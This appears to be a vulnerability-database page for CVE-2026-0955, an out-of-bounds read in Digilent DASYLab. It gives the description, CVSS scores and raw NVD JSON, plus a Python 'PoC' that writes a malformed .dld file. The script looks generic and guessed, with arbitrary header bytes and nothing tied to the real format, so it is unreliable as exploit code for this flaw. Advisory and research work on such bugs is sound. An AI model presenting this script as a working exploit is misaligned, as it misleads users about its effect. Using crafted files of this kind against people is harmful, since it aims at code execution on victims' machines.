Security Vulnerability Report
中文
CVE-2026-0955 CVSS 7.8 HIGH

CVE-2026-0955

Published: 2026-03-13 19:53:57
Last Modified: 2026-03-19 17:41:50

Description

There is a memory corruption vulnerability due to an out-of-bounds read when loading a corrupted file in Digilent DASYLab.  This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted file. This vulnerability affects all versions of Digilent DASYLab.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ni:dasylab:*:*:*:*:*:*:*:* - VULNERABLE
Digilent DASYLab < 所有版本(所有版本均受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-0955 PoC - Digilent DASYLab Out-of-Bounds Read # Generate malicious DASYLab file to trigger OOB read import struct def create_malicious_dasylab_file(filename): """Generate a malformed DASYLab file to trigger out-of-bounds read""" # DASYLab file header structure header = bytearray() # File signature (DASYLab format identifier) header.extend(b'DASYLAB') # Version field - corrupted to trigger parsing error header.extend(struct.pack('<I', 0xFFFFFFFF)) # Invalid version # File size field - manipulated to cause OOB read header.extend(struct.pack('<I', 0x00000001)) # Unusually small # Chunk count - excessive to overflow internal counters header.extend(struct.pack('<I', 0x7FFFFFFF)) # Create malformed data chunks data_chunks = bytearray() for i in range(100): # Corrupted chunk header chunk_type = b'\x00' * 4 chunk_size = struct.pack('<I', 0xFFFFFFFF) # Invalid size data_chunks.extend(chunk_type + chunk_size) # Malformed chunk data with invalid pointers malformed_data = b'\x41' * 1000 data_chunks.extend(malformed_data) # EOF marker corruption header.extend(b'\xFF\xFF\xFF\xFF') # Combine header and data malicious_file = header + data_chunks with open(filename, 'wb') as f: f.write(malicious_file) print(f"[+] Malicious DASYLab file created: {filename}") print(f"[+] File size: {len(malicious_file)} bytes") print(f"[!] This file may trigger OOB read in vulnerable versions") if __name__ == "__main__": create_malicious_dasylab_file("CVE-2026-0955.malformed.dld")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0955", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:53:57.400", "lastModified": "2026-03-19T17:41:49.907", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is a memory corruption vulnerability due to an out-of-bounds read when loading a corrupted file in Digilent DASYLab.  This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted file. This vulnerability affects all versions of Digilent DASYLab."}, {"lang": "es", "value": "Existe una vulnerabilidad de corrupción de memoria debido a una lectura fuera de límites al cargar un archivo corrupto en Digilent DASYLab. Esta vulnerabilidad puede resultar en revelación de información o ejecución de código arbitrario. La explotación exitosa requiere que un atacante consiga que un usuario abra un archivo especialmente diseñado. Esta vulnerabilidad afecta a todas las versiones de Digilent DASYLab."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ni:dasylab:*:*:*:*:*:*:*:*", "matchCriteriaId": "C82FAA96-B2A6-45B2-B5ED-00E56EAB3274"}]}]}], "references": [{"url": "https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/out-of-bounds-read-vulnerabilities-in-digilent-dasylab.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}